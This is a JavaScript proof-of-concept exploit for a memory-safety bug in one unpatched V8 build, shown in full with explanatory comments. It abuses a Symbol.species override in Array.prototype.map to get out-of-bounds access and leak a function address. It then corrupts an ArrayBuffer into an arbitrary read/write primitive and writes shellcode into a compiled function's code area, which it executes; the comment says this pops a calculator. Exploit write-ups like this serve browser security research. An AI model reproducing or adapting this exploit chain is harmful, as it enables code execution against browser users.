aggles
Author:
blaptestbed
// Proof-of-concept for a memory-safety bug in one specific, unpatched V8 build.
// `MyArray` overrides `Symbol.species` so that `Array.prototype.map` constructs
// its result through `BuggyArray`, whose constructor allocates the helper objects
// below while `map` is already running on an array whose length was bumped to 9.
// Every out-of-bounds index used afterwards (10, 14, 15) and the constants
// 56 and 128 are tied to the memory layout drawn further down and to that
// build's object layouts; they are not portable and are kept as-is here as a
// historical artifact of the bug, not as something to maintain.
var oob_rw = null;   // JSArray whose element reads/writes go out of bounds after the bug triggers
var leak = null;     // JSArray holding `code`; its backing store sits next to oob_rw (see layout)
var arb_rw = null;   // ArrayBuffer whose length / backing-store fields are overwritten via oob_rw
// Target function: its compiled code is what gets overwritten at the end.
var code = function() { return 1; }
code();   // called once up-front; presumably so `code` already has compiled code — TODO confirm

// Species constructor reached from `myarray.map(...)`. `len` is ignored:
// `super(1)` builds a one-element array, then the three helper objects are
// allocated back-to-back so they land in the layout described below.
class BuggyArray extends Array {
  constructor(len) {
    super(1);
    oob_rw = new Array(1.1, 1.1);   // length 2 — indices 10/14/15 used later are past its end
    leak = new Array(code);
    arb_rw = new ArrayBuffer(4);
  }
};
// Makes Array.prototype.map on a MyArray build its result via BuggyArray.
class MyArray extends Array {
  static get [Symbol.species]() { return BuggyArray; }
}

// One shared 8-byte buffer viewed as a double, as bytes and as two 32-bit words,
// used to move between a double's bit pattern and a 64-bit integer.
// `uint8` is not referenced anywhere below.
var convert_buf = new ArrayBuffer(8);
var float64 = new Float64Array(convert_buf);
var uint8 = new Uint8Array(convert_buf);
var uint32 = new Uint32Array(convert_buf);

// Treats the bit pattern of `dbl` as a 64-bit integer, adds `to_add_int` to it
// (carrying once from the low 32-bit word into the high word when the low word
// overflows) and returns the resulting bit pattern as a double.
// Side effect: overwrites the shared conversion buffer (float64/uint32).
function Uint64Add(dbl, to_add_int) {
  float64[0] = dbl;
  var lower_add = uint32[0] + to_add_int;
  if (lower_add > 0xffffffff) {
    lower_add &= 0xffffffff;   // keep the low 32 bits ...
    uint32[1] += 1;            // ... and carry into the high word
  }
  uint32[0] = lower_add;
  return float64[0];
}

// Memory layout looks like this:
// ================================================================================
// |a_ BuggyArray (0x80) | a_ FixedArray (0x18) | oob_rw JSArray (0x30) |
// --------------------------------------------------------------------------------
// |oob_rw FixedDoubleArray (0x20) | leak JSArray (0x30) | leak FixedArray (0x18) |
// --------------------------------------------------------------------------------
// |arb_rw ArrayBuffer |
// ================================================================================
var myarray = new MyArray();
myarray.length = 9;
myarray[4] = 42;
myarray[8] = 42;
myarray.map(function(x) { return 1000000; });   // runs the BuggyArray constructor above
var js_function_addr = oob_rw[10]; // JSFunction for code()
// Set arb_rw's kByteLengthOffset to something big.
uint32[0] = 0;
uint32[1] = 1000000;
oob_rw[14] = float64[0];
// Set arb_rw's kBackingStoreOffset to
// js_function_addr + JSFunction::kCodeEntryOffset - 1
// (to get rid of Object tag)
oob_rw[15] = Uint64Add(js_function_addr, 56-1);
// With arb_rw now aliasing the JSFunction, read its code entry, then point
// arb_rw's backing store past the code header.
var js_function_uint32 = new Uint32Array(arb_rw);
uint32[0] = js_function_uint32[0];
uint32[1] = js_function_uint32[1];
oob_rw[15] = Uint64Add(float64[0], 128); // 128 = code header size
// pop /usr/bin/xcalc
// Raw, architecture-specific machine code written through arb_rw into the code
// area of `code`; the final `code()` call is what executes it.
var shellcode = new Uint32Array(arb_rw);
shellcode[0] = 0x90909090;
shellcode[1] = 0x90909090;
shellcode[2] = 0x4831c06a;
shellcode[3] = 0xff5f4883;
shellcode[4] = 0xc0094889;
shellcode[5] = 0xc64883c0;
shellcode[6] = 0x350f05;
code();